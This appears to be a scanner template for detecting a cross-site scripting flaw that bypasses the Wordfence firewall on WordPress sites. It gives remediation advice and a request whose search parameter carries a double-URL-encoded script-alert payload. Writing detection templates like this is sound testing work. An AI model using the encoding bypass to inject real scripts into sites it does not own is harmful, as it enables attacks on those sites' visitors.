id: wordpress-wordfence-waf-bypass-xss
info:
  name: Wordpress Wordfence WAF - Cross-Site Scripting
  author:
  - l0ne1y
  description: |-
    WordPress Plugin Wordfence WAF Bypass Protection Cross-Site Scripting Vulnerability
    WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. Wordfence plugin is a malware scanning and firewall plugin used in it.

    The WordPress plugin Wordfence has a cross-site scripting vulnerability, which results from the lack of correct validation of client data in the WEB application. An attacker could exploit this vulnerability to execute client-side code.
  severity: medium
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/wordfence/

    Temporary fix:
    1. Filter the input (and URL parameters), encode the output, and combine the whitelist and blacklist. That is to say, filter all submitted content, filter the parameters in the URL, and filter out relevant content that will cause the script to be executed; and then HTML-encode the content dynamically output to the page so that the script cannot be executed in the browser. Although input filtering can be bypassed, a large number of XSS attacks will still be intercepted; finally, characters are whitelisted or blacklisted.
requests:
- matchers:
  - type: word
    part: body
    words:
    - <script>alert(document.domain)</script>
  - type: word
    part: header
    words:
    - text/html
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/?s=ax6zt%2522%253e%253cscript%253ealert%2528document.domain%2529%253c%252fscript%253ey6uu6'
  method: GET
